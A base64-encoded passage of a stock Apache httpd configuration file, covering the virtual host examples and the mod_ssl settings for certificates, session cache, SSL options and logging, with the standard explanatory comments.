IENhY2hlTWF4RXhwaXJlIDI0CiMgICAgQ2FjaGVMYXN0TW9kaWZpZWRGYWN0b3IgMC4xCiMgICAg Q2FjaGVEZWZhdWx0RXhwaXJlIDEKIyAgICBOb0NhY2hlIGFfZG9tYWluLmNvbSBhbm90aGVyX2Rv bWFpbi5lZHUgam9lcy5nYXJhZ2Vfc2FsZS5jb20KCiM8L0lmTW9kdWxlPgojIEVuZCBvZiBwcm94 eSBkaXJlY3RpdmVzLgoKIyMjIFNlY3Rpb24gMzogVmlydHVhbCBIb3N0cwojCiMgVmlydHVhbEhv c3Q6IElmIHlvdSB3YW50IHRvIG1haW50YWluIG11bHRpcGxlIGRvbWFpbnMvaG9zdG5hbWVzIG9u IHlvdXIKIyBtYWNoaW5lIHlvdSBjYW4gc2V0dXAgVmlydHVhbEhvc3QgY29udGFpbmVycyBmb3Ig dGhlbS4gTW9zdCBjb25maWd1cmF0aW9ucwojIHVzZSBvbmx5IG5hbWUtYmFzZWQgdmlydHVhbCBo b3N0cyBzbyB0aGUgc2VydmVyIGRvZXNuJ3QgbmVlZCB0byB3b3JyeSBhYm91dAojIElQIGFkZHJl c3Nlcy4gVGhpcyBpcyBpbmRpY2F0ZWQgYnkgdGhlIGFzdGVyaXNrcyBpbiB0aGUgZGlyZWN0aXZl cyBiZWxvdy4KIwojIFBsZWFzZSBzZWUgdGhlIGRvY3VtZW50YXRpb24gYXQgPFVSTDpodHRwOi8v d3d3LmFwYWNoZS5vcmcvZG9jcy92aG9zdHMvPgojIGZvciBmdXJ0aGVyIGRldGFpbHMgYmVmb3Jl IHlvdSB0cnkgdG8gc2V0dXAgdmlydHVhbCBob3N0cy4KIwojIFlvdSBtYXkgdXNlIHRoZSBjb21t YW5kIGxpbmUgb3B0aW9uICctUycgdG8gdmVyaWZ5IHlvdXIgdmlydHVhbCBob3N0CiMgY29uZmln dXJhdGlvbi4KCiMKIyBVc2UgbmFtZS1iYXNlZCB2aXJ0dWFsIGhvc3RpbmcuCiMKI05hbWVWaXJ0 dWFsSG9zdCAqCgojCiMgVmlydHVhbEhvc3QgZXhhbXBsZToKIyBBbG1vc3QgYW55IEFwYWNoZSBk aXJlY3RpdmUgbWF5IGdvIGludG8gYSBWaXJ0dWFsSG9zdCBjb250YWluZXIuCiMgVGhlIGZpcnN0 IFZpcnR1YWxIb3N0IHNlY3Rpb24gaXMgdXNlZCBmb3IgcmVxdWVzdHMgd2l0aG91dCBhIGtub3du CiMgc2VydmVyIG5hbWUuCiMKIzxWaXJ0dWFsSG9zdCAqPgojICAgIFNlcnZlckFkbWluIHdlYm1h c3RlckBkdW1teS1ob3N0LmV4YW1wbGUuY29tCiMgICAgRG9jdW1lbnRSb290IC93d3cvZG9jcy9k dW1teS1ob3N0LmV4YW1wbGUuY29tCiMgICAgU2VydmVyTmFtZSBkdW1teS1ob3N0LmV4YW1wbGUu Y29tCiMgICAgRXJyb3JMb2cgbG9ncy9kdW1teS1ob3N0LmV4YW1wbGUuY29tLWVycm9yX2xvZwoj ICAgIEN1c3RvbUxvZyBsb2dzL2R1bW15LWhvc3QuZXhhbXBsZS5jb20tYWNjZXNzX2xvZyBjb21t b24KIzwvVmlydHVhbEhvc3Q+CgojPFZpcnR1YWxIb3N0IF9kZWZhdWx0XzoqPgojPC9WaXJ0dWFs SG9zdD4KCiMjCiMjICBTU0wgR2xvYmFsIENvbnRleHQKIyMKIyMgIEFsbCBTU0wgY29uZmlndXJh dGlvbiBpbiB0aGlzIGNvbnRleHQgYXBwbGllcyBib3RoIHRvCiMjICB0aGUgbWFpbiBzZXJ2ZXIg YW5kIGFsbCBTU0wtZW5hYmxlZCB2aXJ0dWFsIGhvc3RzLgojIwoKIwojICAgU29tZSBNSU1FLXR5 cGVzIGZvciBkb3dubG9hZGluZyBDZXJ0aWZpY2F0ZXMgYW5kIENSTHMKIwo8SWZEZWZpbmUgSEFW RV9TU0w+CkFkZFR5cGUgYXBwbGljYXRpb24veC14NTA5LWNhLWNlcnQgLmNydApBZGRUeXBlIGFw cGxpY2F0aW9uL3gtcGtjczctY3JsICAgIC5jcmwKPC9JZkRlZmluZT4KCjxJZk1vZHVsZSBtb2Rf c3NsLmM+CgojICAgUGFzcyBQaHJhc2UgRGlhbG9nOgojICAgQ29uZmlndXJlIHRoZSBwYXNzIHBo cmFzZSBnYXRoZXJpbmcgcHJvY2Vzcy4KIyAgIFRoZSBmaWx0ZXJpbmcgZGlhbG9nIHByb2dyYW0g KGBidWlsdGluJyBpcyBhIGludGVybmFsCiMgICB0ZXJtaW5hbCBkaWFsb2cpIGhhcyB0byBwcm92 aWRlIHRoZSBwYXNzIHBocmFzZSBvbiBzdGRvdXQuClNTTFBhc3NQaHJhc2VEaWFsb2cgIGJ1aWx0 aW4KCiMgICBJbnRlci1Qcm9jZXNzIFNlc3Npb24gQ2FjaGU6CiMgICBDb25maWd1cmUgdGhlIFNT TCBTZXNzaW9uIENhY2hlOiBGaXJzdCB0aGUgbWVjaGFuaXNtIAojICAgdG8gdXNlIGFuZCBzZWNv bmQgdGhlIGV4cGlyaW5nIHRpbWVvdXQgKGluIHNlY29uZHMpLgojU1NMU2Vzc2lvbkNhY2hlICAg ICAgICBub25lCiNTU0xTZXNzaW9uQ2FjaGUgICAgICAgIHNobWh0OmxvZ3Mvc3NsX3NjYWNoZSg1 MTIwMDApCiNTU0xTZXNzaW9uQ2FjaGUgICAgICAgIHNobWNiOmxvZ3Mvc3NsX3NjYWNoZSg1MTIw MDApClNTTFNlc3Npb25DYWNoZSAgICAgICAgIHNobTpsb2dzL3NzbF9zY2FjaGUoNTEyMDAwKQpT U0xTZXNzaW9uQ2FjaGVUaW1lb3V0ICAzMDAKCiMgICBTZW1hcGhvcmU6CiMgICBDb25maWd1cmUg dGhlIHBhdGggdG8gdGhlIG11dHVhbCBleGNsdXNpb24gc2VtYXBob3JlIHRoZQojICAgU1NMIGVu Z2luZSB1c2VzIGludGVybmFsbHkgZm9yIGludGVyLXByb2Nlc3Mgc3luY2hyb25pemF0aW9uLiAK U1NMTXV0ZXggIGZpbGU6bG9ncy9zc2xfbXV0ZXgKCiMgICBQc2V1ZG8gUmFuZG9tIE51bWJlciBH ZW5lcmF0b3IgKFBSTkcpOgojICAgQ29uZmlndXJlIG9uZSBvciBtb3JlIHNvdXJjZXMgdG8gc2Vl ZCB0aGUgUFJORyBvZiB0aGUgCiMgICBTU0wgbGlicmFyeS4gVGhlIHNlZWQgZGF0YSBzaG91bGQg YmUgb2YgZ29vZCByYW5kb20gcXVhbGl0eS4KIyAgIFdBUk5JTkchIE9uIHNvbWUgcGxhdGZvcm1z IC9kZXYvcmFuZG9tIGJsb2NrcyBpZiBub3QgZW5vdWdoIGVudHJvcHkKIyAgIGlzIGF2YWlsYWJs ZS4gVGhpcyBtZWFucyB5b3UgdGhlbiBjYW5ub3QgdXNlIHRoZSAvZGV2L3JhbmRvbSBkZXZpY2UK IyAgIGJlY2F1c2UgaXQgd291bGQgbGVhZCB0byB2ZXJ5IGxvbmcgY29ubmVjdGlvbiB0aW1lcyAo YXMgbG9uZyBhcwojICAgaXQgcmVxdWlyZXMgdG8gbWFrZSBtb3JlIGVudHJvcHkgYXZhaWxhYmxl KS4gQnV0IHVzdWFsbHkgdGhvc2UKIyAgIHBsYXRmb3JtcyBhZGRpdGlvbmFsbHkgcHJvdmlkZSBh IC9kZXYvdXJhbmRvbSBkZXZpY2Ugd2hpY2ggZG9lc24ndAojICAgYmxvY2suIFNvLCBpZiBhdmFp bGFibGUsIHVzZSB0aGlzIG9uZSBpbnN0ZWFkLiBSZWFkIHRoZSBtb2Rfc3NsIFVzZXIKIyAgIE1h bnVhbCBmb3IgbW9yZSBkZXRhaWxzLgpTU0xSYW5kb21TZWVkIHN0YXJ0dXAgYnVpbHRpbgpTU0xS YW5kb21TZWVkIGNvbm5lY3QgYnVpbHRpbgojU1NMUmFuZG9tU2VlZCBzdGFydHVwIGZpbGU6L2Rl di9yYW5kb20gIDUxMgojU1NMUmFuZG9tU2VlZCBzdGFydHVwIGZpbGU6L2Rldi91cmFuZG9tIDUx MgojU1NMUmFuZG9tU2VlZCBjb25uZWN0IGZpbGU6L2Rldi9yYW5kb20gIDUxMgojU1NMUmFuZG9t U2VlZCBjb25uZWN0IGZpbGU6L2Rldi91cmFuZG9tIDUxMgoKIyAgIExvZ2dpbmc6CiMgICBUaGUg aG9tZSBvZiB0aGUgZGVkaWNhdGVkIFNTTCBwcm90b2NvbCBsb2dmaWxlLiBFcnJvcnMgYXJlCiMg ICBhZGRpdGlvbmFsbHkgZHVwbGljYXRlZCBpbiB0aGUgZ2VuZXJhbCBlcnJvciBsb2cgZmlsZS4g IFB1dAojICAgdGhpcyBzb21ld2hlcmUgd2hlcmUgaXQgY2Fubm90IGJlIHVzZWQgZm9yIHN5bWxp bmsgYXR0YWNrcyBvbgojICAgYSByZWFsIHNlcnZlciAoaS5lLiBzb21ld2hlcmUgd2hlcmUgb25s eSByb290IGNhbiB3cml0ZSkuCiMgICBMb2cgbGV2ZWxzIGFyZSAoYXNjZW5kaW5nIG9yZGVyOiBo aWdoZXIgb25lcyBpbmNsdWRlIGxvd2VyIG9uZXMpOgojICAgbm9uZSwgZXJyb3IsIHdhcm4sIGlu Zm8sIHRyYWNlLCBkZWJ1Zy4KU1NMTG9nICAgICAgbG9ncy9zc2xfZW5naW5lX2xvZwpTU0xMb2dM ZXZlbCBlcnJvcgoKPC9JZk1vZHVsZT4KCjxJZkRlZmluZSBIQVZFX1NTTD4KCiMjCiMjIFNTTCBW aXJ0dWFsIEhvc3QgQ29udGV4dAojIwoKPFZpcnR1YWxIb3N0IF9kZWZhdWx0Xzo0NDM+CgojICBH ZW5lcmFsIHNldHVwIGZvciB0aGUgdmlydHVhbCBob3N0CiNEb2N1bWVudFJvb3QgIi9ldGMvaHR0 cGQvaHRkb2NzIgojU2VydmVyTmFtZSBuZXcuaG9zdC5uYW1lCiNTZXJ2ZXJBZG1pbiB5b3VAeW91 ci5hZGRyZXNzCkVycm9yTG9nIGxvZ3MvZXJyb3JfbG9nClRyYW5zZmVyTG9nIGxvZ3MvYWNjZXNz X2xvZwoKIyAgIFNTTCBFbmdpbmUgU3dpdGNoOgojICAgRW5hYmxlL0Rpc2FibGUgU1NMIGZvciB0 aGlzIHZpcnR1YWwgaG9zdC4KU1NMRW5naW5lIG9uCgojICAgU1NMIENpcGhlciBTdWl0ZToKIyAg IExpc3QgdGhlIGNpcGhlcnMgdGhhdCB0aGUgY2xpZW50IGlzIHBlcm1pdHRlZCB0byBuZWdvdGlh dGUuCiMgICBTZWUgdGhlIG1vZF9zc2wgZG9jdW1lbnRhdGlvbiBmb3IgYSBjb21wbGV0ZSBsaXN0 LgojU1NMQ2lwaGVyU3VpdGUgQUxMOiFBREg6IUVYUE9SVDU2OlJDNCtSU0E6K0hJR0g6K01FRElV TTorTE9XOitTU0x2MjorRVhQOitlTlVMTAoKIyAgIFNlcnZlciBDZXJ0aWZpY2F0ZToKIyAgIFBv aW50IFNTTENlcnRpZmljYXRlRmlsZSBhdCBhIFBFTSBlbmNvZGVkIGNlcnRpZmljYXRlLiAgSWYK IyAgIHRoZSBjZXJ0aWZpY2F0ZSBpcyBlbmNyeXB0ZWQsIHRoZW4geW91IHdpbGwgYmUgcHJvbXB0 ZWQgZm9yIGEKIyAgIHBhc3MgcGhyYXNlLiAgTm90ZSB0aGF0IGEga2lsbCAtSFVQIHdpbGwgcHJv bXB0IGFnYWluLiBBIHRlc3QKIyAgIGNlcnRpZmljYXRlIGNhbiBiZSBnZW5lcmF0ZWQgd2l0aCBg bWFrZSBjZXJ0aWZpY2F0ZScgdW5kZXIKIyAgIGJ1aWx0IHRpbWUuIEtlZXAgaW4gbWluZCB0aGF0 IGlmIHlvdSd2ZSBib3RoIGEgUlNBIGFuZCBhIERTQQojICAgY2VydGlmaWNhdGUgeW91IGNhbiBj b25maWd1cmUgYm90aCBpbiBwYXJhbGxlbCAodG8gYWxzbyBhbGxvdwojICAgdGhlIHVzZSBvZiBE U0EgY2lwaGVycywgZXRjLikKU1NMQ2VydGlmaWNhdGVGaWxlIC9ldGMvaHR0cGQvY29uZi9zc2wu Y3J0L3NlcnZlci5jcnQKI1NTTENlcnRpZmljYXRlRmlsZSAvZXRjL2h0dHBkL2NvbmYvc3NsLmNy dC9zZXJ2ZXItZHNhLmNydAoKIyAgIFNlcnZlciBQcml2YXRlIEtleToKIyAgIElmIHRoZSBrZXkg aXMgbm90IGNvbWJpbmVkIHdpdGggdGhlIGNlcnRpZmljYXRlLCB1c2UgdGhpcwojICAgZGlyZWN0 aXZlIHRvIHBvaW50IGF0IHRoZSBrZXkgZmlsZS4gIEtlZXAgaW4gbWluZCB0aGF0IGlmCiMgICB5 b3UndmUgYm90aCBhIFJTQSBhbmQgYSBEU0EgcHJpdmF0ZSBrZXkgeW91IGNhbiBjb25maWd1cmUK IyAgIGJvdGggaW4gcGFyYWxsZWwgKHRvIGFsc28gYWxsb3cgdGhlIHVzZSBvZiBEU0EgY2lwaGVy cywgZXRjLikKU1NMQ2VydGlmaWNhdGVLZXlGaWxlIC9ldGMvaHR0cGQvY29uZi9zc2wua2V5L3Nl cnZlci5rZXkKI1NTTENlcnRpZmljYXRlS2V5RmlsZSAvZXRjL2h0dHBkL2NvbmYvc3NsLmtleS9z ZXJ2ZXItZHNhLmtleQoKIyAgIFNlcnZlciBDZXJ0aWZpY2F0ZSBDaGFpbjoKIyAgIFBvaW50IFNT TENlcnRpZmljYXRlQ2hhaW5GaWxlIGF0IGEgZmlsZSBjb250YWluaW5nIHRoZQojICAgY29uY2F0 ZW5hdGlvbiBvZiBQRU0gZW5jb2RlZCBDQSBjZXJ0aWZpY2F0ZXMgd2hpY2ggZm9ybSB0aGUKIyAg IGNlcnRpZmljYXRlIGNoYWluIGZvciB0aGUgc2VydmVyIGNlcnRpZmljYXRlLiBBbHRlcm5hdGl2 ZWx5CiMgICB0aGUgcmVmZXJlbmNlZCBmaWxlIGNhbiBiZSB0aGUgc2FtZSBhcyBTU0xDZXJ0aWZp Y2F0ZUZpbGUKIyAgIHdoZW4gdGhlIENBIGNlcnRpZmljYXRlcyBhcmUgZGlyZWN0bHkgYXBwZW5k ZWQgdG8gdGhlIHNlcnZlcgojICAgY2VydGlmaWNhdGUgZm9yIGNvbnZpbmllbmNlLgojU1NMQ2Vy dGlmaWNhdGVDaGFpbkZpbGUgL2V0Yy9odHRwZC9jb25mL3NzbC5jcnQvY2EuY3J0CgojICAgQ2Vy dGlmaWNhdGUgQXV0aG9yaXR5IChDQSk6CiMgICBTZXQgdGhlIENBIGNlcnRpZmljYXRlIHZlcmlm aWNhdGlvbiBwYXRoIHdoZXJlIHRvIGZpbmQgQ0EKIyAgIGNlcnRpZmljYXRlcyBmb3IgY2xpZW50 IGF1dGhlbnRpY2F0aW9uIG9yIGFsdGVybmF0aXZlbHkgb25lCiMgICBodWdlIGZpbGUgY29udGFp bmluZyBhbGwgb2YgdGhlbSAoZmlsZSBtdXN0IGJlIFBFTSBlbmNvZGVkKQojICAgTm90ZTogSW5z aWRlIFNTTENBQ2VydGlmaWNhdGVQYXRoIHlvdSBuZWVkIGhhc2ggc3ltbGlua3MKIyAgICAgICAg IHRvIHBvaW50IHRvIHRoZSBjZXJ0aWZpY2F0ZSBmaWxlcy4gVXNlIHRoZSBwcm92aWRlZAojICAg ICAgICAgTWFrZWZpbGUgdG8gdXBkYXRlIHRoZSBoYXNoIHN5bWxpbmtzIGFmdGVyIGNoYW5nZXMu CiNTU0xDQUNlcnRpZmljYXRlUGF0aCAvZXRjL2h0dHBkL2NvbmYvc3NsLmNydAojU1NMQ0FDZXJ0 aWZpY2F0ZUZpbGUgL2V0Yy9odHRwZC9jb25mL3NzbC5jcnQvY2EtYnVuZGxlLmNydAoKIyAgIENl cnRpZmljYXRlIFJldm9jYXRpb24gTGlzdHMgKENSTCk6CiMgICBTZXQgdGhlIENBIHJldm9jYXRp b24gcGF0aCB3aGVyZSB0byBmaW5kIENBIENSTHMgZm9yIGNsaWVudAojICAgYXV0aGVudGljYXRp b24gb3IgYWx0ZXJuYXRpdmVseSBvbmUgaHVnZSBmaWxlIGNvbnRhaW5pbmcgYWxsCiMgICBvZiB0 aGVtIChmaWxlIG11c3QgYmUgUEVNIGVuY29kZWQpCiMgICBOb3RlOiBJbnNpZGUgU1NMQ0FSZXZv Y2F0aW9uUGF0aCB5b3UgbmVlZCBoYXNoIHN5bWxpbmtzCiMgICAgICAgICB0byBwb2ludCB0byB0 aGUgY2VydGlmaWNhdGUgZmlsZXMuIFVzZSB0aGUgcHJvdmlkZWQKIyAgICAgICAgIE1ha2VmaWxl IHRvIHVwZGF0ZSB0aGUgaGFzaCBzeW1saW5rcyBhZnRlciBjaGFuZ2VzLgojU1NMQ0FSZXZvY2F0 aW9uUGF0aCAvZXRjL2h0dHBkL2NvbmYvc3NsLmNybAojU1NMQ0FSZXZvY2F0aW9uRmlsZSAvZXRj L2h0dHBkL2NvbmYvc3NsLmNybC9jYS1idW5kbGUuY3JsCgojICAgQ2xpZW50IEF1dGhlbnRpY2F0 aW9uIChUeXBlKToKIyAgIENsaWVudCBjZXJ0aWZpY2F0ZSB2ZXJpZmljYXRpb24gdHlwZSBhbmQg ZGVwdGguICBUeXBlcyBhcmUKIyAgIG5vbmUsIG9wdGlvbmFsLCByZXF1aXJlIGFuZCBvcHRpb25h bF9ub19jYS4gIERlcHRoIGlzIGEKIyAgIG51bWJlciB3aGljaCBzcGVjaWZpZXMgaG93IGRlZXBs eSB0byB2ZXJpZnkgdGhlIGNlcnRpZmljYXRlCiMgICBpc3N1ZXIgY2hhaW4gYmVmb3JlIGRlY2lk aW5nIHRoZSBjZXJ0aWZpY2F0ZSBpcyBub3QgdmFsaWQuCiNTU0xWZXJpZnlDbGllbnQgcmVxdWly ZQojU1NMVmVyaWZ5RGVwdGggIDEwCgojICAgQWNjZXNzIENvbnRyb2w6CiMgICBXaXRoIFNTTFJl cXVpcmUgeW91IGNhbiBkbyBwZXItZGlyZWN0b3J5IGFjY2VzcyBjb250cm9sIGJhc2VkCiMgICBv biBhcmJpdHJhcnkgY29tcGxleCBib29sZWFuIGV4cHJlc3Npb25zIGNvbnRhaW5pbmcgc2VydmVy CiMgICB2YXJpYWJsZSBjaGVja3MgYW5kIG90aGVyIGxvb2t1cCBkaXJlY3RpdmVzLiAgVGhlIHN5 bnRheCBpcyBhCiMgICBtaXh0dXJlIGJldHdlZW4gQyBhbmQgUGVybC4gIFNlZSB0aGUgbW9kX3Nz bCBkb2N1bWVudGF0aW9uCiMgICBmb3IgbW9yZSBkZXRhaWxzLgojPExvY2F0aW9uIC8+CiNTU0xS ZXF1aXJlICggICAgJXtTU0xfQ0lQSEVSfSAhfiBtL14oRVhQfE5VTEwpLyBcCiMgICAgICAgICAg ICBhbmQgJXtTU0xfQ0xJRU5UX1NfRE5fT30gZXEgIlNuYWtlIE9pbCwgTHRkLiIgXAojICAgICAg ICAgICAgYW5kICV7U1NMX0NMSUVOVF9TX0ROX09VfSBpbiB7IlN0YWZmIiwgIkNBIiwgIkRldiJ9 IFwKIyAgICAgICAgICAgIGFuZCAle1RJTUVfV0RBWX0gPj0gMSBhbmQgJXtUSU1FX1dEQVl9IDw9 IDUgXAojICAgICAgICAgICAgYW5kICV7VElNRV9IT1VSfSA+PSA4IGFuZCAle1RJTUVfSE9VUn0g PD0gMjAgICAgICAgKSBcCiMgICAgICAgICAgIG9yICV7UkVNT1RFX0FERFJ9ID1+IG0vXjE5Mlwu NzZcLjE2MlwuWzAtOV0rJC8KIzwvTG9jYXRpb24+CgojICAgU1NMIEVuZ2luZSBPcHRpb25zOgoj ICAgU2V0IHZhcmlvdXMgb3B0aW9ucyBmb3IgdGhlIFNTTCBlbmdpbmUuCiMgICBvIEZha2VCYXNp Y0F1dGg6CiMgICAgIFRyYW5zbGF0ZSB0aGUgY2xpZW50IFguNTA5IGludG8gYSBCYXNpYyBBdXRo b3Jpc2F0aW9uLiAgVGhpcyBtZWFucyB0aGF0CiMgICAgIHRoZSBzdGFuZGFyZCBBdXRoL0RCTUF1 dGggbWV0aG9kcyBjYW4gYmUgdXNlZCBmb3IgYWNjZXNzIGNvbnRyb2wuICBUaGUKIyAgICAgdXNl ciBuYW1lIGlzIHRoZSBgb25lIGxpbmUnIHZlcnNpb24gb2YgdGhlIGNsaWVudCdzIFguNTA5IGNl cnRpZmljYXRlLgojICAgICBOb3RlIHRoYXQgbm8gcGFzc3dvcmQgaXMgb2J0YWluZWQgZnJvbSB0 aGUgdXNlci4gRXZlcnkgZW50cnkgaW4gdGhlIHVzZXIKIyAgICAgZmlsZSBuZWVkcyB0aGlzIHBh c3N3b3JkOiBgeHhqMzFaTVRaemtWQScuCiMgICBvIEV4cG9ydENlcnREYXRhOgojICAgICBUaGlz IGV4cG9ydHMgdHdvIGFkZGl0aW9uYWwgZW52aXJvbm1lbnQgdmFyaWFibGVzOiBTU0xfQ0xJRU5U X0NFUlQgYW5kCiMgICAgIFNTTF9TRVJWRVJfQ0VSVC4gVGhlc2UgY29udGFpbiB0aGUgUEVNLWVu Y29kZWQgY2VydGlmaWNhdGVzIG9mIHRoZQojICAgICBzZXJ2ZXIgKGFsd2F5cyBleGlzdGluZykg YW5kIHRoZSBjbGllbnQgKG9ubHkgZXhpc3Rpbmcgd2hlbiBjbGllbnQKIyAgICAgYXV0aGVudGlj YXRpb24gaXMgdXNlZCkuIFRoaXMgY2FuIGJlIHVzZWQgdG8gaW1wb3J0IHRoZSBjZXJ0aWZpY2F0 ZXMKIyAgICAgaW50byBDR0kgc2NyaXB0cy4KIyAgIG8gU3RkRW52VmFyczoKIyAgICAgVGhpcyBl eHBvcnRzIHRoZSBzdGFuZGFyZCBTU0wvVExTIHJlbGF0ZWQgYFNTTF8qJyBlbnZpcm9ubWVudCB2 YXJpYWJsZXMuCiMgICAgIFBlciBkZWZhdWx0IHRoaXMgZXhwb3J0YXRpb24gaXMgc3dpdGNoZWQg b2ZmIGZvciBwZXJmb3JtYW5jZSByZWFzb25zLAojICAgICBiZWNhdXNlIHRoZSBleHRyYWN0aW9u IHN0ZXAgaXMgYW4gZXhwZW5zaXZlIG9wZXJhdGlvbiBhbmQgaXMgdXN1YWxseQojICAgICB1c2Vs ZXNzIGZvciBzZXJ2aW5nIHN0YXRpYyBjb250ZW50LiBTbyBvbmUgdXN1YWxseSBlbmFibGVzIHRo ZQojICAgICBleHBvcnRhdGlvbiBmb3IgQ0dJIGFuZCBTU0kgcmVxdWVzdHMgb25seS4KIyAgIG8g Q29tcGF0RW52VmFyczoKIyAgICAgVGhpcyBleHBvcnRzIG9ic29sZXRlIGVudmlyb25tZW50IHZh cmlhYmxlcyBmb3IgYmFja3dhcmQgY29tcGF0aWJpbGl0eQojICAgICB0byBBcGFjaGUtU1NMIDEu eCwgbW9kX3NzbCAyLjAueCwgU2lvdXggMS4wIGFuZCBTdHJvbmdob2xkIDIueC4gVXNlIHRoaXMK IyAgICAgdG8gcHJvdmlkZSBjb21wYXRpYmlsaXR5IHRvIGV4aXN0aW5nIENHSSBzY3JpcHRzLgoj ICAgbyBTdHJpY3RSZXF1aXJlOgojICAgICBUaGlzIGRlbmllcyBhY2Nlc3Mgd2hlbiAiU1NMUmVx dWlyZVNTTCIgb3IgIlNTTFJlcXVpcmUiIGFwcGxpZWQgZXZlbgojICAgICB1bmRlciBhICJTYXRp c2Z5IGFueSIgc2l0dWF0aW9uLCBpLmUuIHdoZW4gaXQgYXBwbGllcyBhY2Nlc3MgaXMgZGVuaWVk CiMgICAgIGFuZCBubyBvdGhlciBtb2R1bGUgY2FuIGNoYW5nZSBpdC4KIyAgIG8gT3B0UmVuZWdv dGlhdGU6CiMgICAgIFRoaXMgZW5hYmxlcyBvcHRpbWl6ZWQgU1NMIGNvbm5lY3Rpb24gcmVuZWdv dGlhdGlvbiBoYW5kbGluZyB3aGVuIFNTTAojICAgICBkaXJlY3RpdmVzIGFyZSB1c2VkIGluIHBl ci1kaXJlY3RvcnkgY29udGV4dC4gCiNTU0xPcHRpb25zICtGYWtlQmFzaWNBdXRoICtFeHBvcnRD ZXJ0RGF0YSArQ29tcGF0RW52VmFycyArU3RyaWN0UmVxdWlyZQo8RmlsZXMgfiAiXC4oY2dpfHNo dG1sfHBodG1sfHBocDM/KSQiPgogICAgU1NMT3B0aW9ucyArU3RkRW52VmFycwo8L0ZpbGVzPgo8 RGlyZWN0b3J5ICIvdmFyL3d3dy9jZ2ktYmluIj4KICAgIFNTTE9wdGlvbnMgK1N0ZEVudlZhcnMK PC9EaXJlY3Rvcnk+CgojICAgU1NMIFByb3RvY29sIEFkanVzdG1lbnRzOgojICAgVGhlIHNhZmUg YW5kIGRlZmF1bHQgYnV0IHN0aWxsIFNTTC9UTFMgc3RhbmRhcmQgY29tcGxpYW50IHNodXRkb3du CiMgICBhcHByb2FjaCBpcyB0aGF0IG1vZF9zc2wgc2VuZHMgdGhlIGNsb3NlIG5vdGlmeSBhbGVy dCBidXQgZG9lc24ndCB3YWl0IGZvcgojICAgdGhlIGNsb3NlIG5vdGlmeSBhbGVydCBmcm9tIGNs aWVudC4gV2hlbiB5b3UgbmVlZCBhIGRpZmZlcmVudCBzaHV0ZG93bgojICAgYXBwcm9hY2ggeW91 IGNhbiB1c2Ugb25lIG9mIHRoZSBmb2xsb3dpbmcgdmFyaWFibGVzOgojICAgbyBzc2wtdW5jbGVh bi1zaHV0ZG93bjoKIyAgICAgVGhpcyBmb3JjZXMgYW4gdW5jbGVhbiBzaHV0ZG93biB3aGVuIHRo ZSBjb25uZWN0aW9uIGlzIGNsb3NlZCwgaS5lLiBubwojICAgICBTU0wgY2xvc2Ugbm90aWZ5IGFs ZXJ0IGlzIHNlbmQgb3IgYWxsb3dlZCB0byByZWNlaXZlZC4gIFRoaXMgdmlvbGF0ZXMKIyAgICAg dGhlIFNTTC9UTFMgc3RhbmRhcmQgYnV0IGlzIG5lZWRlZCBmb3Igc29tZSBicmFpbi1kZWFkIGJy b3dzZXJzLiBVc2UKIyAgICAgdGhpcyB3aGVuIHlvdSByZWNlaXZlIEkvTyBlcnJvcnMgYmVjYXVz ZSBvZiB0aGUgc3RhbmRhcmQgYXBwcm9hY2ggd2hlcmUKIyAgICAgbW9kX3NzbCBzZW5kcyB0aGUg Y2xvc2Ugbm90aWZ5IGFsZXJ0LgojICAgbyBzc2wtYWNjdXJhdGUtc2h1dGRvd246CiMgICAgIFRo aXMgZm9yY2VzIGFuIGFjY3VyYXRlIHNodXRkb3duIHdoZW4gdGhlIGNvbm5lY3Rpb24gaXMgY2xv c2VkLCBpLmUuIGEKIyAgICAgU1NMIGNsb3NlIG5vdGlmeSBhbGVydCBpcyBzZW5kIGFuZCBtb2Rf c3NsIHdhaXRzIGZvciB0aGUgY2xvc2Ugbm90aWZ5CiMgICAgIGFsZXJ0IG9mIHRoZSBjbGllbnQu IFRoaXMgaXMgMTAwJSBTU0wvVExTIHN0YW5kYXJkIGNvbXBsaWFudCwgYnV0IGluCiMgICAgIHBy YWN0aWNlIG9mdGVuIGNhdXNlcyBoYW5naW5nIGNvbm5lY3Rpb25zIHdpdGggYnJhaW4tZGVhZCBi cm93c2Vycy4gVXNlCiMgICAgIHRoaXMgb25seSBmb3IgYnJvd3NlcnMgd2hlcmUgeW91IGtub3cg dGhhdCB0aGVpciBTU0wgaW1wbGVtZW50YXRpb24KIyAgICAgd29ya3MgY29ycmVjdGx5LiAKIyAg IE5vdGljZTogTW9zdCBwcm9ibGVtcyBvZiBicm9rZW4gY2xpZW50cyBhcmUgYWxzbyByZWxhdGVk IHRvIHRoZSBIVFRQCiMgICBrZWVwLWFsaXZlIGZhY2lsaXR5LCBzbyB5b3UgdXN1YWxseSBhZGRp dGlvbmFsbHkgd2FudCB0byBkaXNhYmxlCiMgICBrZWVwLWFsaXZlIGZvciB0aG9zZSBjbGllbnRz LCB0b28uIFVzZSB2YXJpYWJsZSAibm9rZWVwYWxpdmUiIGZvciB0aGlzLgojICAgU2ltaWxhcmx5 LCBvbmUgaGFzIHRvIGZvcmNlIHNvbWUgY2xpZW50cyB0byB1c2UgSFRUUC8xLjAgdG8gd29ya2Fy b3VuZAojICAgdGhlaXIgYnJva2VuIEhUVFAvMS4xIGltcGxlbWVudGF0aW9uLiBVc2UgdmFyaWFi bGVzICJkb3duZ3JhZGUtMS4wIiBhbmQKIyAgICJmb3JjZS1yZXNwb25zZS0xLjAiIGZvciB0aGlz LgpTZXRFbnZJZiBVc2VyLUFnZW50ICIuKk1TSUUuKiIgXAogICAgICAgICBub2tlZXBhbGl2ZSBz c2wtdW5jbGVhbi1zaHV0ZG93biBcCiAgICAgICAgIGRvd25ncmFkZS0xLjAgZm9yY2UtcmVzcG9u c2UtMS4wCgojICAgUGVyLVNlcnZlciBMb2dnaW5nOgojICAgVGhlIGhvbWUgb2YgYSBjdXN0b20g U1NMIGxvZyBmaWxlLiBVc2UgdGhpcyB3aGVuIHlvdSB3YW50IGEKIyAgIGNvbXBhY3Qgbm9uLWVy cm9yIFNTTCBsb2dmaWxlIG9uIGEgdmlydHVhbCBob3N0IGJhc2lzLgpDdXN0b21Mb2cgbG9ncy9z c2xfcmVxdWVzdF9sb2cgXAogICAgICAgICAgIiV0ICVoICV7U1NMX1BST1RPQ09MfXggJXtTU0xf Q0lQSEVSfXggXCIlclwiICViIgoKPC9WaXJ0dWFsSG9zdD4gICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgCgo8L0lmRGVmaW5lPgoKCiMgbHhwIE1pbWUtVHlwZQpBZGRUeXBlIGFwcGxp 